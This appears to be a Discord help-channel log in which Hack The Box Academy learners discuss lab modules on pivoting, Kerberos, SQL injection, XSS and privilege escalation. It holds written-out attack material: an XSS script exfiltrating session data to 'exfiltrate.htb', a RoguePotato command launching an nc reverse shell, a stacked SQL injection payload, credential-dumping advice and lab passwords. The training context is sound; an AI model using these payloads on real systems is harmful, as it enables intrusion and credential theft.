welp, if its pinlocked and you dont have any way to leak information of the system you are attacking thats a deadend

i belive you would at least need lfi to leak the pin

is that a box?

Hi everyone!
I need advices of Linux experts
I want to learn linux administrator I don't know where to start, but for now I started to learn set linux as server for web sites. I write basic code in html
By browsing IP address I can see my site but I can not see from outside of network I know why but I don't know how to access from outside network?!

you will need to port forward

and use your public ip

Can you explain more?! From where to where?

don't self host unless you know what you're doing, host it somewhere else

Once ive had a box with that, to recreate a pin code for a python based terminal in admin page, never seen something like it in a module

Agile was like that

Ah right agile

#boxes then

You will need to portforward from your router. But as @next bronze said i woulnt do it as the risk-reward isnt that great. Rather host a server from a provider or something

Hmm, understood

BTW does someone know resources to learn linux sys adminstrator I need platform like hackthebox if there is. I searched from google I found 6 hour video from you tube it is not okay to me because I have problem listening I am not native english

hey @hallow kiln , I got it working but I did it with ssh dynamic port forward & on the second host installed the agent.

didn't managed to understand Y this works & installing 2 agents didn't, cause if I'll need another pivot I'm not sure that it will work ...

How can one adequately prepare for participation in CTFs that adopt a Jeopardy-style format?

both agents need to connect to the same port, since the proxy server only listen on one port

U referring if I'll start another agent?

cause when I did it only through ligolo (2 agents) it didn't work?
(I guess they work on the same port, I didn't changed anything, configured the second agent as I did the first one)

If someone know about it, please let me know I'm very curious about this

double pivot with ligolo works, done it a lot of times, if you didnt' change anything for the second agent then that's your problem. the second agent needs to connect to the listener of the first agent, which connect to the proxy listener, it's like human centipede but with ligolo agents

@umbral fulcrum https://www.youtube.com/watch?v=P5cvjHvRJr8&t=271s this is a good video demonstration with double pivoting

I just got this answerC:\Windows\System32\cmd.exe
When I submit, the web told me it's wrong😫

if this is your first question, we needt o know the module, section and question

could be a formtting issue

well, INTRODUCTION TO WINDOWS COMMAND LINE the first chapter

oh I haven't done that one, what's the question?

The question is "In what directory can the cmd executable be found? (just the folder name as answer)" and I input "where.exe cmd.exe" in powershell

try System32

wait that's a thing, oh wow

When I input this code, it returns "C:\Windows\System32\cmd.exe"

as the answer? System32 as the answer, does it say it's right?

Wow, it;s correct!

Thanks Bro!

Hi it's me again !Stillstuck on the ADCS couse for ESC4... I did that command : .\Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /password:Password /ptt ... Got the ticket here is : PS C:\Tools> klist

Current LogonId is 0:0xc5e6d

Cached Tickets: (1)

#0> Client: administrator @ LAB.LOCAL
Server: krbtgt/lab.local @ LAB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 1/15/2024 15:27:51 (local)
End Time: 1/16/2024 1:27:51 (local)
Renew Time: 1/22/2024 15:27:51 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

But still got access denied : PS C:\Tools> dir C:\users\molly
dir : Access to the path 'C:\users\molly' is denied.
At line:1 char:1

• dir C:\users\molly\

•   + CategoryInfo          : PermissionDenied: (C:\users\molly\:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
  
  

PS C:\Tools> dir \lab-dc.lab.local\c$\users\molly
dir : Access to the path '\lab-dc.lab.local\c$\users\molly' is denied.
At line:1 char:1

• dir \lab-dc.lab.local\c$\users\molly\

•   + CategoryInfo          : PermissionDenied: (\\lab-dc.lab.local\c$\users\molly\:String) [Get-ChildItem], Unauthori
   zedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

I tryied to ask a tgs with cifs service... noluck again

Oh, you can try "System32"?

Hey, I'm done with nmap enumeration module and I wanted to learn/practise more on bypassing firewalls. So what am I supposed to do?

FYI, I used winrs to connect back to the dc and got the file. Really don't understand why I cannot type the file even with the ticket but that worked.

is that the only ticket in your session?

Yes

After getting TGS for CIFSgot that one too: #3> Client: administrator @ LAB.LOCAL
Server: cifs/lab-dc.lab.local @ LAB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 1/15/2024 15:32:25 (local)
End Time: 1/16/2024 1:31:56 (local)
Renew Time: 1/22/2024 15:31:56 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
PS C:\Tools>

And with winrs got HTTP too.

@next bronze , and I dont find that info... (Abuse ESC4 to change the configuration for the template ESC4. Afterward, submit the value of the property Certificate Name Flag.) by the way thanks a lot for your help

hmm weird so you need to specifically get a ST to get access

tbh I don't use rubeus enough to know why

I use it a lot... but can't figureit out why this is not working.

but all good. will try to find that name.

it should just be in the output iirc

@next bronze xD

For Advanced XSS and CSRF Exploitation Skills Assessment, || I'm able to bypass the CSP and execute XSS attacks, but there's no CORS configured (If i'm not wrong) I'm stuck from moving from here. Also, where the XSS payload resides, I don't think I'm getting any hit from the bot viewing it (is it even viewing it?)|| Any nudge would be appreciated
|| I did find a weird thing that, even tho there were no CORS configured, I was getting data back to my exfil server from an auth endpoint when I visit it myself? Would be nice if I can get this explained ||

You're banned from DM'ing me from now on @quick crane

yo guys does anyone know anything abt how to change an an sql command through the query

my task is to change a price of a product through a searchbar

Your Query: SELECT * FROM products WHERE prod_name = 'searchfor'

So I am in the Advanced XSS and CSRF Exploitation

and it wants me to access the local storage property to grab the auth bearer that is stored in victims local storage, and then set Authorization header.

This is module Enumeration internal API´s

try {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://api.vulnerablesite.htb/v1/sessions', false);
    xhr.withCredentials = true;
    xhr.send();
    var msg = xhr.responseText;
} catch (error) {
    var msg = error;
}

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(msg), false);
exfil.send();

What did he do 😂

does someone have a good example how I would exfiltrate the bearer

UPDATE ... SET ... WHERE ....

HOLD ON

SELECT * FROM products WHERE prod_name = 'UPDATE products SET prod_price = 3000 WHERE prod_name = The Holy Grail'

this ends up as the query

UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail' this is the command i typed in but i got a syntax error

and here the holy grail is with out ' ' jsut to show it

if you're asking for help for homework that that's all the help you're gonna get, I don't recall there being a module about this

i mean im just asking TT

sqli is the topic

you need to finish the first query using ; and then start the second, using both SELECT and UPDATE in the same query is not supported.

and then the trick is to use the right amount of ' and " to break out of the original query and create valid syntax

I'm doing the Attacking Applications Connecting to Services and having trouble debugging the 'octopus checker' binary... I am trying to set the breakpoint to the address where it calls the SQLDriverConnect function but gdb is just telling me that it 'Cannot insert breakpoint 1. Cannot access memory at address etc..'. I am following the module exactly. Do I need to format the address breakpoint command a certain way?

OHHHHH SMART IDEA OMG ILL TRY!!

I have tried breakpoint commands b *0x11b0 and b *0x00000000000011b0

The Holy Grail; UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail'. like this?

you need to run before adding the breakpoint

run then add the breakpoint then run again

Yep that makes sense. Thanks!

Haven't used gdb hardly at all

on htb windows privilege escalation for the kernal exploit, is it malfunctioning? i see a user hacker on there...seems like they didnt clean things out

works perfectly. Whats the issue?

none of the exploits work either lol

didnt work 😔

Looks better, but you need to make sure you insert the ‘ at the right place, in your example it doesn’t break out of the original query until right before the second „the holy grail“

ARGHHHH COMPICATED

so the problem is the second graail

Your Query: SELECT * FROM products WHERE prod_name = 'The Holy Grail'; UPDATE products SET prod_price = 3000 WHERE prod_name = The Holy Grail'

tried this but failed

Unfortunately I seem to get the exact same error. I actually can't seem to create any breakpoints. I have tried running in sudo as well just in case... any ideas? Going to try just transferring it to my own machine and looking at it there

@faint rampart when i run the hivenightmare exploit, i dont see the file your suppose to pull from impapcket

Are you just missing a single quote on the prod_name at the end?

if only i knew my friend TT

does it tell you whats wrong? the beginning part looks much better, it selects then breaks out and updates. I see you are missing a ' before the second "The Holy Grail" and you may have to consider that there is also a ' at the end of the original query. You can either use the origiinal ' or learn how to comment it out in sql

i tried commenting it out

the ' seems to be always at the end

try what you did above but just add a ' before the second "The Holy Grail"

so i have 0 clue what to do here haha

The Holy Grail'; UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail'

Your Query: SELECT * FROM products WHERE prod_name = 'The Holy Grail'; UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail''

this is the outcome

it doesnt tell me whats wrong no

WAIT

IT CHANGED THE PROD

INTO THE 3K THAT I WANT

i just noticed TT

Yup thats what I did, but you can achieve the same results on the host directly, I recall reading somewhere, about a Position Independent executable aka PIE , so the base address changes each time you run it, you need to run it before setting a breakpoint for that reason.

then run it afterwards again, they left that part out in the module section for some reason.

The Holy Grail'; UPDATE products SET prod_price = 3000 WHERE prod_name = 'The Holy Grail - this is the right answer

THANK U OLLI <33

Ah I see that makes sense. Managed to get it working on my machine. Thanks for your help

thats the one that even works perfectly, you should probably move to a writable directory, I think it copies the file to current working directory

anytime

also check the privileges if they are enabled

Lemme check my notes lol dont remember

im able to save the hashes to a file and make and write to the file in that directory O.o

but copy

can i DM you @faint rampart

A little bit occupied rn maybe be a little patient for someone to come assist, or wait a little

sorry

Its fine man 😅 dont apologise

If you used the printnightmare psh exploit you need to log off the box so the privileges reflect after logon.

I'd advice you ignore the hacker user and just make yours lol

got it, i figured that as much

If you wanna use the service tracing CVE (the last one) you could use some other payload, I had issues witht he https one, shell kept dieing.

hiii

You could also use some uac bypass scripts, didnt try that yet but it should work. like RunasCs or check the next couple sessions for a Bypass-UAC script

hey for the injection assessment w/ the ssrf chained to the exfil exploitation would someone be willing to talk to me direct about the approach or methods for doing this bc i don't know if you're supposed to use something from earlier in the modules or something else but it seems kinda weird .. ☮️

having trouble using burp intruder for burp intruder chapter in using proxies can someone help me in telling me where I'm going wrong

Any hints for AD Enumeration & Attacks - Skills Assessment Part I?
Got sql service password but can't authenticate to that service inside AD network. Rev shell is also very unstable and many of the tools are not working because of that. I setup port forwarding with meterpreter shell so I can use tools directly from my machine too.

||spray||

Hi! I am a bit lost in Active Directory Enumeration & Attacks Assessment II
Currently I am at:

• Q8: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. Got LOST
• Q9: Answered from Bloodhound C*** username
• Q10: Crack this user's password hash and submit the cleartext password as your answer. Got LOST

I am RDP with both of the accounts user A---- and user B ---- running Inveigth with 0 luck.
Got a bunch of kerberoast tickets but no luck with hashcat.
Can anyone point me to the right direction? Much appricieted ❤️

Hi... I just owned Monitored from Season 4 and forgot to share my achievement on LinkedIn... How do I get the achievemt pop to show up again so I can post in on my social media?

@marble pond Can you help me?

not aris, but maybe better place on #1080884182336675872 ?

@supple gorge It says No Access

Hmm, it works for me, did you link your htb account to your discord through the bot commands or something of the sort?

Not sure what else could be the case

No I didn't

Oh... I got it

Which part?

dig further into the machine and dump everything for q8, try toook for a way to capture the hash for q10

I used snaffer, and i might missed something but i dont think so

for which question?

q8

I said dump everything, snaffler doesn't actually dump much

try mimikatz

okay

@oblique spoke Question number 4 I got 1,2,3 but then got stuck.

maybe i use a wrong user for this?

not A--- and B--

Dump everything on the microsoft machine

you gonna see some cleartext pw in the logs

i was already able to dump with kerberos::list, this is what you ment?

you have question 6 yes?

and 7?

i have 7 yes, but that user is only db user

yeah dump everything on that host, you should have system

Hello, can someone help me with the module "Introduction to Digital Forensic" (more precisly the "Practical Digital Forensics Scenario" exercice part) please? :)

didnt worked

then you didn't look hard enough

I usually like to dump with multiple tools, Ive seen some cases where different tools had different results, even supposedly using the same methods

my order of preference being impacket -> lazagne -> mimikatz

Lasagna?

Impacked didnt gave me any output, didnt tried lazagne and i am trying with minikatz

Wow, massive respect for that instantaneous garfield follow up.

I mean, you don't have creds to use Impacket iirc, unless you dumped sam and got the local admin hash

which Ive done because I like impacket output so much

I tried to dump sam but no rights in rdb with both users

I do that too lol

huh? don't you have system?

No i have 2 usernames || BR086 and AB290 || with pw

what how'd you get the flag then

Which one? The sql?

flag 7, you need admin for that

anyways, if you have a service user, check what prices they have

Oh yeah i logged in to the sql machine with the web creds and used a tool tonescalate the priv then made reverse shell with ncat and read rhe fike

Butbthat vas on the another machine

Okay im gonna check that tomorrow its pretty late here, thank you for the tip

yes check that machine

in multi box environments, escalating to system isnt necessarily the end of the box. You should do post system/root credential har vesting for lateral movement

guys I struggle at AD Enumeration & Attacks - Skills Assessment Part II Q7 "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. " I try to upload the compiled executable of JuicyPotato but everytime i get an access denied error

are you uploading to a dir where the user has write perms to

The advanced Deserialization Lab has reallly bad performance, Its almost impossible to use, and sucks because we are suppose to use Visual Studio, dnSpy and some other tools that uses a lot of RAM. I spend all day in the lab and is very frustrating. I dont think it has to be a Windows 10 vm, it can be a Windows 7-8 maybe.

I tried to log into wrong host with first creds 💀 Now the excercise is flying by

may I DM ?

is there a difference between sub-domains and a virtual host?

yes

vhosts are hosts that are stored on the same machine. technically they dont even need to be the same domain at all.

sub domains can have entirely different IPs

for ex, shared web hosting servers? Each domain on there is implemented with vhosts even though theyre seperate clients with seperate domains

interesting

enuming vhosts is just an easy way to also enum sub domains in some scenarios

working on ffuf fuzzing sub-domains and vhosts

The Password Attacks Module is no joke

For the following question, "Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. " I was able to get the password using the ||Default Creds list|| adding entries for MySql to a new .list file like the example gave, but when I run it through hydra it kept getting an error. Are we supposed to be able to use the brute forcing tool when doing this section or is it supposed to be guess and check? Additionally I don't see what having sam's credentials do for you as I wasn't able to do anything while ssh'd into the account.

You can only access the sql server internally

hey guys

new to cybersecurity any suggestions?

Anytime I tried to login to the mysql server from sam's account i got an error.

Id start with reading #welcome and verifying your account so you can ask in better channels

Well Sam might not be an sql user. This is why they have you do a short brute force manually

The default creds list is 100% intended

Sup? I am doing Introduction to Digital Forensics and I have problems to understand this part "Accessed Time (A): This timestamp reflects the last occasion when the file was accessed or read, updating whenever the file is opened or otherwise engaged.". What means "engaged" in this context?

Are we supposed to be able to automate it or do it manually? I was able to submit the correct answer from the list but when I tried to sign in from the pwnbox I kept getting errors. Is there a database name that we are supposed to find?

Shouldn't need to just mysql -u [username] -p [password] afaik

You have to be connected to Sam via ssh

And run through the list that way

I am, I also just pm'ed a snipped of what I keep seeing.

I dont recall if I had to specify anything like a database name

¯_(ツ)_/¯

It's been ages tbh

I figured it out, dumb mistake/syntax but we're golden.

Ye that tends to be the case

did as he did, but when I start a new session I get:
error: a tunnel is already using this interface name. Please use a different name using the --tun option

& when I do:
start --tun something_else
I get:
ERRO[0221] Unable to create tunnel, err:unable to create tun interface 'something_else' (tun.New no such device), make sure you've created the tun interface and that it's not in use

Guys what am I doing wrong (Q7, AD Enumeration & Attacks - Skills Assessment Part 2)?

SQL> xp_cmdshell C:\Users\Public\RoguePotato.exe -r 172.16.7.240 -l 9999 -c "{69F9CB25-25E2-4BE1-AB8F-07AA7CB535E8}" -e "c:\Users\Public\nc.exe 172.16.7.240 8443 -e cmd"
output

[+] Starting RoguePotato...

[] Creating Rogue OXID resolver thread

[] Creating Pipe Server thread..

[] Creating TriggerDCOM thread...

[] Listening on pipe .\pipe\RoguePotato\pipe\epmapper, waiting for client to connect

[] Calling CoGetInstanceFromIStorage with CLSID:{69F9CB25-25E2-4BE1-AB8F-07AA7CB535E8}

[] Starting RogueOxidResolver RPC Server listening on port 9999 ...

[*] IStoragetrigger written:106 bytes

[-] Named pipe didn't received any connect request. Exiting ...

NULL

have you created the interface?

try a different clsid

Evening all - Just looking to get a sanity check here. I'm on the knowledge check for the Getting Started module, so looking for a point in the right direction, rather than actual help.

I've gone through and done my Web Enumeration on the target IP, found and documented quite a nice amount of info. Now I'm looking to gain a foothold. I reckon I know how to do it, once logged in, although I cannot seem to get the password.

Spoilers below:

||I found the below, when searching the site||
||Admin.xml||
||Username: Admin||
||Password: d033e22ae348aeb5660fc2140aec35850c4da997||
||Email: admin@gettingstarted.com||

Am I right in thinking, the ||Password|| is encoded? I've tried decoding on Base64, Roti13 and hex but it doesn't output anything. So could I assume this is hashed? But I feel that's me going too deep and getting sidetracked 😄

Many thanks,

Is the access to 10.10.110.35 due to the upload of the PDF?

I never did those modules but the password does indeed look like MD5 hash, I would give it a try.

I'm not sure how....
😔

I did the second just as the first one ...

same as how you created the first tunnel

being able to read errors and fix them is a core skill

It's not an MD5 - getting errors when trying to decode it. I'm also reading it's not possible to decode MD5 to it's original output

you absolutely can reverse MD5. its called hash cracking

Well the idea of the tools is not to decode the hash, it's to find a hash that matches from an already existing database of hashes.

Ah apologies, let me search again! Thank you!

Np!

just eyeballing it and I agree it doesnt look like md5 though. but def looks like a hash, maybe sha

@fallow snow I would suggest looking into a tool called John the Ripper. You will definitely use it later on multiple times

Thanks, I found an online hash checker, and have succesfully decoded it.

Thank you 🙂

Great!

just for future reference when referring to hashes, the term would be 'cracked' not 'decoded'

but congrats

ah, my bad!

I'm slowly learning all the lingo 😄

no worries, just a bit of terminology to learn

https://academy.hackthebox.com/module/143/section/1484
" Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop. "

For this command(sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap) to run successfully , I would have to pivot to that IP address right?(I ran the command on the attack machine and of course it did not work.)

can i paste screenshots in this thread?

after you verify your account with #welcome

oh ok

thanks

172. is common for HTB's internal IPs, so yeah probably have to pivot

Hello this is my first time in the HTB discord since im seeking for a bit of help on the Stack-Based buffer Overflows on Linux - Indentifying Bad Characters module

In gdb im trying to run the command in the screenshot to pass the python output to the input of the program

Here's my issue, when I try to pass a NOP (\x90) to the program the NOP gets encoded in UTF8, so when I inspect the stack, the values inside it are not actually NOPs, but instead these are represented in two bytes (due to UTF8 encoding)

so what should be 0x90 is instead 0xc2 0x90 inside the stack

So when trying buffer overflows this completely messes up the entire process because:

1- The NOPs are not being read as actual NOPs

2- each \x90 now occupies two bytes of space instead of one byte which completely shifts my offset to the rip or the instruction pointer

Does anyone know a way to solve this?

I just figured what U saying ...
every tunnel must connect to a new interface which needed to be up, so the amount of the session is the amount of the interfaces

damn I got my head deep in the ground I couldn't understand what @full nimbus was explaining me

thanx @next bronze , @hallow kiln , @full nimbus & @fathom pendant

Yep you can chain listeners.

You can also drop the current connection and use a new session

As it's still technically connected

No need to make n amount of interfaces

that's where the new update comes in, you don't have to drop the connection, make an interface for every tunnel. I don't think it lets you switch the session like that anymore

Newer version forces you to stop the current tunnel and start a new one

Yep but you can still stop the tunnel, switch session, start

I did this in the pivoting module for practice in the double pivot sections

As long as you have the listener set up on the session it'll work

if you stop the tunnel wouldn't it kill the connection?

Well the way that older versions worked is it stopped the tunnel from sessionA and started it on sessionB

yep

It's the same thing

Except manually

still getting the same error

Because you have the listener pointing back to your proxy

ah okay didn't test it enough to find out

So once sessionB is initiated, you can drop the tunnel A and switch to B

It's one of those weird things

¯_(ツ)_/¯

But it's basically still connected through the session listener

Bc when you start the agent on B you point it back to A in the chain

Also just bc your rdp session may drop, the commands Are still running on the desktop you used

interesting

Ye so it's still listening

I'm definitely interested though in its continued development, hope they bring back the tunnel swapping feature

Or give it an argument flag like start --switch

Am I being dumb, or does this not work on purpose?

It doesn't work on purpose. The purpose of signing in as admin is to get plug-in versions

Fwiw you can edit the themes without being signed in as admin

The blah/themes/

hm, ok. But iut doesn't have an image upload plugin.. it only have a theme and send data. So I don't see how I could use that?

Or do plugins automatically get like root access?

Based on the plug-in information and vulnerabilities: go off that

Assuming I could download a vulnerable plugin?

One of those looks interesting

You don't need to download one. Just use what's available to you

Welp, MY Pwnbox ran out of time 😄 So it's a tomorrow job now!

Awesome, I'll take note and have a crack again tomorrow.

Highly suggest setting up your own vm so you're not time restricted lol

Once I start on the actual HTB website, I will. But whilst working full time, I like the 2 hour cap, as it allows me to learn, but also makes it so I don't burn myself out 😄

and then I go to bed thinking about it and more motivated to tackle it again in the morning/evening

It allows you to save things as well

So you can easily pick back up if your notes missed something

Ya, like logs and stuff

I.e. cracked creds

yeye. Currently using VSCode to make notes of it all

Use obsidian

1000x better

How come? I really like vsc

Obsidian supports markdown and allows you to backlink to other note pages

hmm, I'll take a looksie!

so you can make headers

subheadings

subsubheadings

ahhh niceee!

Or links

Yeah currently I do this:

-[[ Web Enumeration
NMAP inital IP to find open ports
    use --open to limit to only open ports
    use -oA to output and include a file name to document all findings
    Full TCP Port scan can be done using: nmap -p- --open -oA <fileName> <targetIP> (this takes a while)
    use nmap scripts or targeted ports to find more info with: nmap -sC -p <port,port> -oA <fileName> <targetIP>

    if targeting Web Servers, you can specify scripts, this is a http enumeration script to find directories:
        nmap -sV --script=http-enum -oA <fileName> <targetIP> 

https://academy.hackthebox.com/module/143/section/1484

I don't know why This scan (||sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap||)

) is still generatinng an error even though I followed the steps to run a pivot(I used the 'Enabling Dynamic Port Forwarding with SSH’' method too from section 3 of the pivot module) .

Obsidian

tyty - Anyhow. Good night. Again thanks for the help!

cherytree old but gold

I suggest looking into the ligolo-ng tool, it's far better for pivoting

Also there is a linux host on this network you can use

obsidian is just better vscode for notes, I used to write markdown in vsc, found out that obsidian does everything better

172.16.5.225 htb-student:HTB_@cademy_stdnt! @cedar void

do yall actually use notes? I would always try to use things like obsidian for notes but i always write them down and never look at them anymore

Hey anyone around to help with Footprinting-SMTP section?

yup, all the time

can i have a link to a page of your notes to see how you write stuff down?

i either always write everything, which is kinda pointless, or write too little

then make them better. writing your own notes is the best way to retain information and makes it easier to refer back

I ran this command (for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) 😉 on target machine and it returned three internal addresses(including the one you listed )

Does this have advice for HTBA SMTP in footprinting, the second question? "Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer."

sorry I cannot share most of my notes.

Generally Ill have a couple different types of notes. Ill have pages that are overviews/conceptual that summarize a topic so I can understand, and then Ill have most specific note pages that are basically annotated cheatsheets

and I use folders to organize by topics

this shows a bit of organization. Not as clean as I could make it though

You're expressly told about the linux machine

What have you attempted to do?

smtp-user-enum

Interesting. At some point i did have it organized like that, the most useful thing for me was going back to linux commands for tools. I will start again on this. Ty for sharing

you tried a certain framework?

I think I started off confused since the section didnt touch on enumerating users within smtp so I was kind of lost at the get go on how to start it

you can use the msfconsole tool to enumerate remote services that may have the smtp port too

what do you mean by that, remote sercices that have the smtp port too?

Sorry, I meant remote services, as in the remote target

I basically started out organizing it by academy modules, and then as Ive started to gather information from other places or doing overlapping modules Ive started moving things around

googling the first answer in that section gives you more information that can aid you in answering the 2nd question too.

So I enumerated the service successfully, I tried looking in msfconsole for that version and nothing to my knowledge came up

I used nmap --script smtp-enum-users.nse xx.xxx.xxx.xx and got some users

^ I got the flag btw, thanks @cedar void

Can someone help me with this?

Module: Advanced Xss and CSRF Exploitation
Section: Bypassing CSRF Tokens via CORS Misconfigurations

I can find the HTML element and post parameter for the final payload. I cannot get the CORS misconfiguration to work and promote my privilege's.

i cant beat the hard footprinting lab still

im forever hard locked on this stupid lab

What are you stuck on?

i got the creds but i cant get imaps to work

https://book.hacktricks.xyz/network-services-pentesting/pentesting-imap

Take a step back: why can't you get it to work

cant login

the login command dont work

don't work means what? what's the error

could either be your command is wrong or your creds are wrong

i did login then user name and pass it worked on pop3s

wrap spoilers in double bars (||)

or use /spoiler at the start, like a command, instead of at the end

kk

i haven't done that module, so I won't be much help sorry, but im sure someone else here has

i just want to be free from this stupid lab

Pop3s isn't the way, imaps is gonna help more

i couldnt login in for some reason

"For some reason"

Imaps requires a prefix

said the command was wrong but it wasnt

[Any character] login username password

i just used login in lol

In imaps, port 993

Pop3 uses different commands

bad error in IMAP command received by server

Paste exactly what you're doing, replacing the username and password with user and pass

Imap, as stated, requires a prefix character before the command

klist lists the krb5 variable right? i put a keytab file location to the krb5 variable but klist odesnt work

I nned help.

So I Navigate it on elastic but it won’t go through need help

The question is

Just did it: was able to use imap command

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on “Discover”. Then, click on the calendar icon, specify “last 15 years”, and click on “Apply”. Finally, choose the “windows*” index pattern. Now, execute the KQL query that is mentioned in the “Comparison Operators” part of this section and enter the username of the disabled account as your answer. Just the username; no need to account for the domain.

what did you use

i used the asterisk as a character before login

Don't use asterisk

Use any standard character

And a space

Actually nvm * works

i had to use a t

You can just use any combination of characters before the command, you just need a space after the prefix

I literally keysmashed and the command went through

Klist should get it or kinit iirc it's been a minute since I did this

i c ok danke

now i dont see what i need i changed to the directory

The module has a list of imap commands

yea im using them right now

The only one I'll say to change is the fetch

thats the one i just tried

Instead of 'all' use 'body[]'

okay

You need to select the mailbox with messages in it to fetch it

i did but it wont take it

Did you list all mailboxes?

yea

i went for the one that indicates urgent

When you select a mailbox it will tell you if there's emails in it

[N] exists

Also it is entirely possible to get it with pop3s, imaps is just "smoother" to see what you're doing

Logged in and retrieved with 0 issues

So both imaps and pop3s work as intended for this skill assessment

anyone facing problem with spawning machines ?

Nope, took a few minutes but the machine was smooth

stuck for 15 min

Try changing vpn region and see if that makes a difference

You'd obviously need to download a new vpn

thanks , I am good now

👍 sometimes the servers shit the bed

Hi, currently working on "Introduction to Deserialization Attacks" skill assessment II, I was able to get admin on the page but I'm stuck in getting RCE, Any hint will be appreciated.

any advice for /home/carlos@inlanefreight.htb/.scripts/john.keytab

View the script

See where it points

i mean the impersonate the ivc_ guy

from carlos acc i did i was able to get the aes hash

but not the ntlm hash for that acc...

• 0 Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

Crack that hash 😉

The hash you get from there is great for the next step

oh i c ok danke and also when u do su - why do u need to put carlos@inlanefreight.htb instead of just carlos

User@domain

It's common in domain joined systems

oh i c

you are connecting to domain controller by using that too?

The linux host is connected to a domain, and is requiring domain user logins

o i c

its not in the passwd file tho

I forget how I cracked it but it wasn't difficult from what I remember.

no i mean how did it authenticae if its not in passwd file

It's authing through a domain controller

o i c

danke

wat da hell... su: Permission denied

nvmm i figured it out danke

back to this , I solved the challenge while ago , now I am trying to refresh my memory
I use the same cmd as my note , but can't get the flag , it's always closed

Maybe you're missing out on some evasion?

thanks , my notes was fucked up it wasn't the right cmd
this awkward

I need help, I'm really confused on the explanation of getting MSSQL hashes using responder for an account, how exactly do I get the hash for an account other than the one I am logged into using responder?

It's calling out using a user-agent

So instead of asking as [user] it's asking as [service]

Ok I got the hash, I don't know what the hell happened

exec master..xp_dirtree '\\10.10.14.29\share\'
when I run this why does it trigger mssqlsvc to do something?

It's asking sqlsvc to query an smb server

okay

so used to mysql as it's the db i worked with in the past, but not mssql, it's super alien to me

but I got the basic commands jotted down a t least

The skill assessment involving it is a bit out there to say the least btw

Are you sure it ONLY deletes?

Hlo

I need help

Elaborate

This is vague af

What module and section are you working on

What have you done, what are you struggling with

i am playing season 4

Machine Bizness

OK so thus is the wrong channel entirely

Read #welcome to find out how to access more or the server #1193249174301442128 is the more appropriate place to ask for nudges

I found the bizness machine user flag

This channel is for help with htb academy modules

You will not get help with main platform labs here

But as soon as I submit, you are telling me it is wrong.

Sir

Ok ok

Read my previous statements

This is not the place to ask for help

hey guys. Im doing the securecoding module and have found that jsnice got rid of the packer and detection functions. Does anyone have a recommonded packer detection and variable renamer for javascript?

Not a Packer detection per se, but online compiler https://www.programiz.com/javascript/online-compiler/

hmmm I really need something that renames tha variables so they make sense so I can reverse engineer them like in the module

Just use a print statement

It works just the same and I believe it's mentioned

like just run the code and output the result so no need to manually analyse what the codes doing?

Replacing the exec or w/e statement with print()

Ah it's a t4 module. That's why I didn't recognize it. Javascript deobfuscation is the module that goes over a bunch of the deobfuscation techniques

Yeha I did that one years ago. Might need a refresher I think

If you're fairly familiar with js it takes maybe an hourish to complete

yeha

thanks man, much appreciated

Yeah the summary of the advanced module even recommends doing it lol

yeha I thought id be good becasue I did it many moons ago haha.

Time for a bit of a refresher then

yep!

Hello, I suppress the proxy window and intruder also in Burp suite

How can I resettle it

go to view at the top and click on proxy and intruder

did you mean you clicked on hide?

I clicked on the tool and then st popped out of burp to become a window and I deleted this window so it disappeared from burp.

clicking on 'Restore default layout' on View tab doesnt work?

Thanks man

Np

can anyone maybe allow me to add them and help an aspiring cybersecurity enthusiast start on HTB?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

thx.

Lab machine performance doesn't changed whether you are subscribed or not? Think its just a coincidence that I am suffering from a lot lag since cancelled my sub but just wanted to make sure.

reach out to support

i dumped sam but cant move from SQ01 is there any suggestion? smb server doesnt really work. and the nc shell is weak to run mimikatz on the machine

👍

lots of options, use the local admin hash to dump more things with impacket/netexec, or get a better shell, or run mimikatz in non interactive mode, or save a memdump of lsass

Hello, I try to complete final assessments of Login Brute Forcing module in Academy. I have the user whose username should be guessed as well as the password against SSH service. I have got like 15 variants of his username and around 463 passwords (6945 attempts in total). However the bruteforce by hydra tooks like hours (after 31 mins of running still estimated 2,5 hrs to be running). I'm affraid that I'm not even able to bruteforce it as the testing container with SSH is running like 1 hour.
Is there any possibility how to optimize hydra? (I tried to play with -t parameter, but no significant change)

fucking did it, the MS01 admin flag is done. now the rest of the shit 😄 thanks

Hello I'm stuck on webenum module pwnbox exercise.
It say: "Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag."
This is a big unprecise. What are we actually supposed to search for ?

that's the point, you don't know, so try the things taught in the section

